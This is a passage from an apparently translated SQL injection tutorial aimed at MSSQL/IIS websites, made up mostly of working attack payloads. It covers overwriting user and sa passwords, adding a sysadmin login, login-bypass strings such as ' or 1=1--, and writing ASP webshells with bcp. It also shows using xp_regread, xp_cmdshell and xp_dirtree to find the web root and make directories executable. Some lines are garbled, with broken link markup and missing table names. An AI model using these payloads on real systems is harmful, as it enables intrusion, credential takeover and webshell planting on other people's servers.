9. Use update to update the data in the table:
<a href='<a href='HTTP:///?p=YY;update'' target='_blank'>HTTP:///?p=YY;update'</a> target='_blank'><a href='HTTP:///?p=YY;update</a>' target='_blank'>HTTP:///?p=YY;update</a></a> set pwd='a0b923820dcc509a' where username='www';--
www user password 16-bit MD5 value is: a0b923820dcc509a, that is, change the password to 1;
The 32-bit MD5 value is: , the password is
10. Use the function of exporting table content into files
SQL has a BCP command, which can export the contents of the table into text files and place them in a specified location. Using this function, we can first create a temporary table, then enter an ASP * in the table row by row, and then export it with the BCP command to form an ASP file.
The command line format is as follows:
bcp "select * from temp " queryout c:\inetpub\wwwroot\ –c –S localhost –U sa –P upload(The 'S' parameter is the server that executes the query, the 'U' parameter is the user name, the 'P' parameter is the password, and a * was finally uploaded).
11. Methods to create tables, play data and read data
? Create table:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
? Browse data into the table:
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec .xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
? Read data from the table:
' and 1=(select count(*) from cyfd where gyfd >1)--
? Delete temporary table:
';drop table cyfd;--
12. Change the password of sa directly through SQL statements:
? update set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01, so the password of sa is changed to 1111111. Haha, the solution is to delete sa. , how to delete it, you can refer to my "Completely Delete the Backdoor of Sa".
? View all database user names of this machine:
select * from
select name,sid,password ,dbid from
? Change the sa password method: After connecting with SQL comprehensive utilization tool, execute the command:
exec sp_password NULL,'new password','sa'
13. Query all table names and table structures in the dvbbs library:
? select * from where xtype='U' and status>0
? select * from where id=1426104121
14. Manually backup the current database:
Complete backup:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
Differential backup:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT—
15. Add and delete a user with SA permissions:
exec .sp_addlogin test,ptlove
exec .sp_addsrvrolemember test,sysadmin
/c isql -E /U alma /P /i K:\
16、select * from where xtype='U' and status>0
You can list all the table names created by users in the library ChouYFD.
select name,id from where xtype='U' and status>0
17、
? /zgrdw/common/image_view.jsp?sqlstr=select * from (where id=1234)
List the field names in all tables in the rdweb library
? select * from where id=5575058
List all field names of table id=5575058 in library dvbbs
18. Delete record command: delete from Dv_topic where boardid=5 and topicid=7978
19. Organize the method of bypassing login verification into the background:
1) ' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6)or 1=1--
7) or 'a='a
8)" or "a"="a
9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1
12) 'or''='
13) Popularity%'and 1=1 and '%'='
20. Summary of methods to find website paths:
1) Check the WEB website installation directory command:
? cscript c:\inetpub\adminscripts\ enum w3svc/2/root >c:\ (Try changing 2 to 1, 3, 4, 5)
type c:\
del c:\
The run results can be displayed directly under NBSI, so there is no need to export to a file.
2) Find the name of a picture on the website.
Then write it into the batch process:
d:
dir /s >c:\
e:
dir /s >>c:\
f:
dir /s >>c:\
After execution type c:\
This way to analyze the path of the website
3) The SQL server and the website server are on the same server. OK, you can execute commands, right?
The output result of the execution command is
%windir%\help\iishelp\common\or
Pay attention to the two files of Backup before output
like:
dir c:\ >%windir%\help\iishelp\common\
Then enter a file to access: http://target ip/
4) For win2000 system: xp_regread read HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots Get WEB path
2003 system: xp_regread read, no method found
like:
(1) Create a new table cyfd (the field is gyfd): /?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
(2) Write the web path in:/?id=4844;DECLARE @result varchar(255) exec .xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
(3) Still make him mismatch, display error:/?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: A syntax error occurred when converting the varchar value 'Y:\Web\Yantai Talent Hotline Backend Management System,,201 ' to a column with data type int .
TargeSite: Boolean Read() Hahaha. . The path is exposed. .
(4) Next delete the table:/?id=4844;drop table cyfd;--
5) Use the regedit command to export the registry and save the exported result to %windir%\help\iishelp\common\ or page
Regedit command description:
Regedit /L:system /R:user /E Regpath
Parameter meaning:
/L: system specifies the path to which the file is located.
/R: user specifies the path to which the file is located.
/E: This parameter specifies that the registry editor will perform the export registry operation. After this parameter, one space is left, enter the file name of the export registry.
Regpath: Used to specify which registry branch to export. If not specified, all registry branches will be exported. Among these parameters, the "/L:system" and "/R:user" parameters are optional. If these two parameters are not used, the registry editor will consider it to operate the "" and "" files in the WINDOWS directory. If it is started from the floppy disk and entered DOS, you must use the "/L" and "/R" parameters to specify the specific paths of the "" and "" files, otherwise the registry editor will not be able to find them. For example, if you enter DOS through the startup disk, the command to back up the registry is "Regedit /L:C:\windows\/R:C:\windows\/e ". The command means backing up the entire registry to the WINDOWS directory, and its file name is "". If you enter the command "regedit /E D:\", it means backing up the entire registry to the root directory of D drive (the "/L" and "/R" parameters are omitted), and the file name is "".
regedit /s c:\ (Import c:\file to registry)
regedit /e c:\ (Back up all registered contents to c:\)
For win2000 system: C:\>regedit /e %windir%\help\iishelp\common\"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
Then http://target IP/
For win2003 system: Not found, friends who hope to find will announce it and discuss it together.
6) The file under %SystemRoot%\system32\inetsrv\MetaBack\ under the virtual host is the backup file of iis, which is allowed to be accessed by web users. If your iis backup is here, download it with webshell and open it with notepad, you can get the corresponding domain name and web absolute path.
7) SQL injection creates a virtual directory and cannot find the absolute web path under dbo permission:
In many cases, we encounter SQL injection that can list directories and run commands, but it is difficult to find the directory where the web is located, so it is difficult to get a webshell. This trick is good:
? Create a virtual directory win, point to c:\winnt\system32: exec .xp_cmdshell 'cscript C:\inetpub\AdminScripts\ -c localhost -w "l" -v "win","c:\winnt\system32"'
? Let the win directory have permission to parse asp scripts: exec .xp_cmdshell 'cscript C:\inetpub\AdminScripts\ set w3svc/1/root/win/Accessexecute "true" -s:'
? Delete the virtual directory win: exec .xp_cmdshell 'cscript C:\inetpub\AdminScripts\ delete w3svc/1/root/win/'
? Test: http://127.0.0.1/win/
8) Use SQL statements to find the WEB directory: According to experience, the order of the WEB root directory is: D disk, E disk, and C disk. First, we create a temporary table to store the directory tree generated by master..xp_dirtree (suitable for public), and use the following statement:
;create table temp(dir nvarchar(255),depth varchar(255));--, the dir field of this table represents the name of the directory, and the depth field represents the depth of the directory. Then execute xp_dirtree to obtain the directory tree of disk D, and the statement is as follows:
;insert temp(dir,depth) exec .xp_dirtree 'd:';--
Before performing the following operations, first check how many folders there are on disk D, so that you can have a general understanding of disk D, and the statements are as follows:
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume'))>=Number(number=0, 1, 2, 3...)
Next, we find several first-level subdirectories on the other party's website, such as user and photo, and then use filtering methods to determine whether this disk exists on the WEB root directory. The statement is as follows:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
Look at the return result of the statement. If true, it means that the WEB root directory may be on this disk. For further confirmation, test several more subdirectories:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
...
If all test results are true, it means that the WEB root directory is very likely on this disk.
Assume that the WEB root directory found on this disk, use the following statement to obtain the depth of the first-level subdirectory:
and (select depth from temp where dir='user')>=number(number=1, 2, 3...)
Assuming the depth obtained is 3, it means that the user directory is a level 3 directory of D disk, then the WEB root directory is a level 2 directory of D disk.
At present, we already know the drive letter and depth of the root directory. To find the specific location of the root directory, we will start searching one by one from the root directory of disk D. Of course, there is no need to know the name of each directory, otherwise it will take too much time.
Next, another temporary table is created to store all directories in the level 1 subdirectory of disk D. The statement is as follows:
;create table temp1(dir nvarchar(255),depth varchar(255));--
Then save all directories from the first subdirectory of disk D to temp1, and the statement is as follows:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files ','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir dir);insert into temp1 exec .xp_dirrtree @dirname
Of course, you can also save all directories under the second subdirectory of disk D into temp1, just change the second top 1 to top 2.
Now, all directories under the first level subdirectory of all D disks have been saved in temp1. Then, we use the same method to determine whether the root directory is in this first level subdirectory:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
If it returns true, it means that the root directory may be in this subdirectory. Remember to test a few more examples. If all return false, it means that the WEB root directory is not in this directory. Then we are using the same method to obtain the list of all directories under the 2nd and 3rd subdirectories of the D disk to determine whether the WEB root directory is under it. However, be careful to delete the contents in the temp1 table before using xp_dirtree.
Now suppose that the WEB root directory is in the first level subdirectory of disk D, and the subdirectory name is website. I don’t need to say anything about how to get the name of this directory. Because we knew earlier that the depth of the WEB root directory is 2, we need to know which one is the real WEB root directory under the website.
Now, we use the same method to create the third temporary table:
;create table temp2(dir nvarchar(255),depth varchar(255));--
Then save all directories from the website of D disk to temp2, and the statement is as follows:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM Volume') order by dir desc)T order by dir);insert into temp2 exec .xp_dirrtree @dirname
Of course, you can also save all directories under the second subdirectory of the website of D disk into temp2, just change the second top 1 to top 2.
Now, we use the same method to determine whether the directory is the root directory:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
If the return is true, in order to determine our judgment, test a few more examples, and the method mentioned above is mentioned.
If multiple examples return true, then it is determined that the directory is the WEB root directory.
You can basically obtain the WEB root directory using the above method. Now let's assume that the WEB root directory is: D:\website\www
Then, we can back up the current database to this directory for download. Before backup, we clear the contents of temp, temp1, and temp2, and then save the directory trees of disks C, D, and E to temp, temp1, and temp2 respectively.
After downloading the database, remember to drop the three temporary tables. Now we can find all directory lists in the downloaded database, including the background managed directories and more information.
Previous page12Read the full text